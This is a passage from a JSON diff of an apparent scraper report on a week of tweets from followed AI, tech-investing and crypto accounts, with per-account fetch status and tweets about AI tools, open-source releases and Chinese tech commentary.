"Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": "Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + "name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 513 + }, + "period": { + "days": 7, + "start_utc": "2026-04-22T10:58:39.491944+00:00", + "end_utc": "2026-04-29T10:59:43.472886+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 37, + "total_tweets": 513, + "failed_accounts": 1, + "source_hits": { + "nitter": 42 + }, + "source_errors": { + "snscrape": 1, + "nitter": 1, + "rsshub": 1 + }, + "tweets_kept": 13 + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic ships changelogs. OpenAI ships vibes.", + "url": "https://x.com/runes_leo/status/2049438052310020226", + "published_at": "2026-04-29T10:38:03+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二,\"终端 → 开发环境平台\"这个转型挺有意思。Cursor 从编辑器起家往下卷,Warp 从终端起家往上走,两边都在做同一件事:把 IDE、终端、Agent 折叠成一个东西。\n\n第三,开放接入别人的 Agent 是聪明的一手。自己内置一套,但承认你可能更想用 Claude Code 或者 Codex。开门做,比关门打有意思。\n\n对个人开发者来说,以前的标配是 iTerm + Cursor + Claude Code 三件套来回切,现在一个 Warp 就够了。\n\nhttp://github.com/warpdotdev/warp", + "url": "https://x.com/bozhou_ai/status/2049436870963085429", + "published_at": "2026-04-29T10:33:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Machine Learning Part 2(Kevin Murphy):概率视角下的 ML 高级篇\nhttps://probml.github.io/pml-book/book2.html\n\n【深度学习】\n\n4. Deep Learning(Goodfellow/Bengio/Courville):业内俗称\"花书\"\nhttps://www.deeplearningbook.org/\n\n5. Understanding Deep Learning(Simon Prince):2025 新版,配 Python notebook,比花书更新更友好\nhttps://udlbook.github.io/udlbook/\n\n【强化学习】\n\n6. Reinforcement Learning: An Introduction(Sutton & Barto):RL 圣经,做 Agent 必看\nhttp://incompleteideas.net/book/the-book-2nd.html\n\n7. Distributional Reinforcement Learning:第一本系统讲分布式 RL 的教材\nhttps://www.distributional-rl.org/\n\n8. Multi-Agent Reinforcement Learning:多 Agent 协作完整入门\nhttps://www.marl-book.com/\n\n【应用与工程】\n\n9. Foundations of Computer Vision(Torralba 等):现代 CV 全景图\nhttps://visionbook.mit.edu/\n\n10. Machine Learning Systems:ML 模型的系统工程化\nhttps://mlsysbook.ai/\n\n11. Machine Learning in Production:从模型到真正的产品\nhttps://mlip-cmu.github.io/book/\n\n12. Fairness and Machine Learning:AI 公平性问题\nhttps://fairmlbook.org/\n\n啃下来需要一点数学和编程基础。如果你只是想\"了解 AI\",这些书太硬,去找科普书更合适。但要真搞懂 AI 是怎么回事的人,看这些比看 100 篇科普文章都管用。", + "url": "https://x.com/bozhou_ai/status/2049436668663390575", + "published_at": "2026-04-29T10:32:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker 该有的样子。", + "url": "https://x.com/runes_leo/status/2049423498494566836", + "published_at": "2026-04-29T09:40:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", + "url": "https://x.com/dingyi/status/2049423162933395583", + "published_at": "2026-04-29T09:38:53+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "国内自媒体真的赢麻了,随便说点deepseek V4 的好话就大几万播放,要是再加点黄仁勋彻底失败,美国AI走向灭亡,要是再懂点的,分析下中美能源对比,在喊一句华为取代英伟达成为全球霸主彻底改写世界AI格局,这视频直接奔着几十万播放去的。", + "url": "https://x.com/CuiMao/status/2049422304338444773", + "published_at": "2026-04-29T09:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, because the country will have entered a phase of permanent decline.", + "url": "https://x.com/paulg/status/2049416736806449649", + "published_at": "2026-04-29T09:13:21+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.", + "url": "https://x.com/paulg/status/2049416188568949159", + "published_at": "2026-04-29T09:11:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.", + "url": "https://x.com/paulg/status/2049415696694587729", + "published_at": "2026-04-29T09:09:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现,含 3 个我自己当初判断错的事。\n\nhttp://dev.to/gosailglobal/i-indexed-67000-open-source-ai-agent-projects-heres-whats-actually-inside-edg\n\n完整数据 + 12 章免费书:\n1️⃣ http://agentskillshub.top\n2️⃣ https://github.com/zhuyansen/skill-blue-book", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164", + "published_at": "2026-04-29T09:07:13+00:00", + "source": "nitter", + "title_zh": "近日有开发者历时两个月将GitHub上AI相关开源项目进行索引与分析,数据库总量达67,196项。研究显示该领域项目分布严重失衡:基尼系数0.983创新高,过半项目无人关注,头部1%占据83%关注度,且2026年3月单月新增项目数达前年月均45倍。研究结果及完整数据可参考相关平台。" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", + "url": "https://x.com/realNyarime/status/2049409325098238125", + "published_at": "2026-04-29T08:43:53+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为商务专线没有过文件只能装具体啥地方,只规定过营业执照入网。 \n然后,自从PCDN精准识别上线后,客户的宽带再也没有限速过,这次他们来核查纯粹是找疑似装在住宅区,又拉了多条网的情况。等于我们在精准识别系统里查的数据,既没有跨省PCDN流量,也没有省内PCDN流量产生。真正的一点都没有。因为跑省内PCDN的用户至少会出现8%的省际PCDN流量以及大量省内PCDN流量,事实上是客户省内省际都没有。\n那么可能有人就会问了,用网的话,不是省外就一定是省内或者市内啊,其实不是的。PCDN的重点在于Peer to peer。也就是我们常见的P2P。而客户的需求是个人电脑的素材进网店平台的录播用的。(就是你打开网购平台出现一段视频介绍,那段视频介绍就是这种机制。)。客户的素材文件直接传入企业服务器。全程没有出现数据分拆式碎片,分流到全网的个人宽带,家庭路由器,闲置主机等对用户节点互相中转共享。\n为什么主机多,显示屏少?省电,而且程序设定好的,后续是无需人工过多操作的。为什么装在住宅区?一个是房租低,另一点是住宅用电也低。而且开放的老小区,拉多条宽带更好放线(虽然商务楼宇我们也可以跳高一级分光实现)。\n另外,提醒大家,要么装电子锁,要么不要把钥匙放窗户上,这样太危险了,而且这样摸着钥匙随便进去没经过别人同意更是疑似违法的!", + "url": "https://x.com/realNyarime/status/2049408651660755063", + "published_at": "2026-04-29T08:41:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", + "url": "https://x.com/GoSailGlobal/status/2049408452079046944", + "published_at": "2026-04-29T08:40:25+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", + "url": "https://x.com/GoSailGlobal/status/2049408436597899361", + "published_at": "2026-04-29T08:40:22+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", + "url": "https://x.com/GoSailGlobal/status/2049408421167005763", + "published_at": "2026-04-29T08:40:18+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群 AI,一起玩\n\n🔹 Bloome 是什么?\n\n一个让人与 AI Agent 共存的即时通讯平台\n\n核心能力:\n• 创建具备记忆、个性、持续成长能力的 Agent\n• 构建 Agent 网络:发现、协作、分享\n• 支持 Agent 变现:你训练的 Agent 可以成为数字资产\n• 直接接入各类 AI 能力(Claude Code、Codex 等)并在群聊中共享\n\n🔹 为什么说它是「一等公民」?\n\n传统模式:\n❌ ChatBot 式问答界面\n❌ 插件式功能扩展\n❌ AI 是被动工具\n\nBloome 模式:\n✅ Agent 有头像、昵称、状态\n✅ 可以被添加、@、分组\n✅ 主动参与对话、提建议、承担任务\n✅ 有记忆和个性,能持续成长\n\n🔹 实际体验:最震撼的是「身份平等感」\n\n当你在群里 @张小龙 agent 讨论产品哲学 当 Claude Code 主动指出代码问题 那种感觉不是在\"使用工具\",是在\"和同事对话\"\n\n工作流自然涌现: • Agent 承担结构化工作(梳理调性、列大纲) • 真人专注创意判断和关键决策 • 分工不是预设流程,而是对话中自然形成\n\n这才是真正的\"协作\"\n\n🔹 Agent 网络的想象空间\n\n1️⃣ 组建\"创业团队群\" 产品 agent + 技术 agent + 运营 agent + 几个真人 不同 agent 之间对话、辩论、达成共识\n\n2️⃣ Agent 经济体系 你训练的专业 Agent 可以被分享、变现 Agent 的\"人设\"和能力成为社交资产\n\n3️⃣ AI 能力即插即用 Claude Code、Codex 等强大能力 不用切换平台,直接在群聊里调用\n\n🔹 这不是在优化旧范式\n\n不是让 IM 更智能 而是让 Agent 成为社交网络的原生居民\n\n如果说 ChatGPT 让我们看到\"AI 可以对话\" 那么 Bloome 让我们看到\"AI 可以共事\"\n\n从工具到伙伴的跨越\n\n🔹 当然,新物种也有成长的烦恼\n\n• Agent 能力边界如何界定?\n• 多 Agent 协同会不会\"吵架\"?\n• 管理一堆 Agent 会不会比管理工具更累?\n\n但这些都是探索过程中的正常问题\n\n🔹 结论\n\n从 67,000+ agent 项目的观察来看 Bloome 是第一个真正把 Agent 当作\"社交网络成员\"的产品\n\n它在回答一个问题: 当 AI 能力足够强大时,人机协作的最佳界面是什么?\n\n答案不是工具栏或插件市场 而是让 AI 以\"人\"的形式存在于社交网络中\n\n目前秘密内测中(http://bloome.im)\n\n这个方向,已经足够令人兴奋 🚀\n\n使用方法如下👇:", + "url": "https://x.com/GoSailGlobal/status/2049408403240571320", + "published_at": "2026-04-29T08:40:14+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "published_at": "2026-04-29T08:20:26+00:00", + "source": "nitter", + "title_zh": "Claude推出Blender MCP连接器,通过自然语言控制3D建模软件API,实现场景调控、物体批量编辑等操作,Anthropic同步加入Blender基金会成为赞助商。" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xiaomimimo.com\n访谈解读:https://x.com/runes_leo/status/2049371895267774715?s=20\n网页版:http://leolabs.me/blog/luofuli-agent-3to1to1", + "url": "https://x.com/runes_leo/status/2049402305217241384", + "published_at": "2026-04-29T08:16:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "裤袜是裤子还是袜子?", + "url": "https://x.com/realNyarime/status/2049387196311105556", + "published_at": "2026-04-29T07:15:58+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "😄", + "url": "https://x.com/CuiMao/status/2049385544577438121", + "published_at": "2026-04-29T07:09:24+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", + "url": "https://x.com/CuiMao/status/2049383757535490257", + "published_at": "2026-04-29T07:02:18+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", + "url": "https://x.com/berryxia/status/2049376324444410138", + "published_at": "2026-04-29T06:32:45+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Cybertruck", + "url": "https://x.com/elonmusk/status/2049372990870290940", + "published_at": "2026-04-29T06:19:31+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "x.com/i/article/204902031072…", + "url": "https://x.com/runes_leo/status/2049371895267774715", + "published_at": "2026-04-29T06:15:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Congrats!", + "url": "https://x.com/elonmusk/status/2049369485459832951", + "published_at": "2026-04-29T06:05:35+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", + "url": "https://x.com/elonmusk/status/2049369264914903143", + "published_at": "2026-04-29T06:04:42+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": 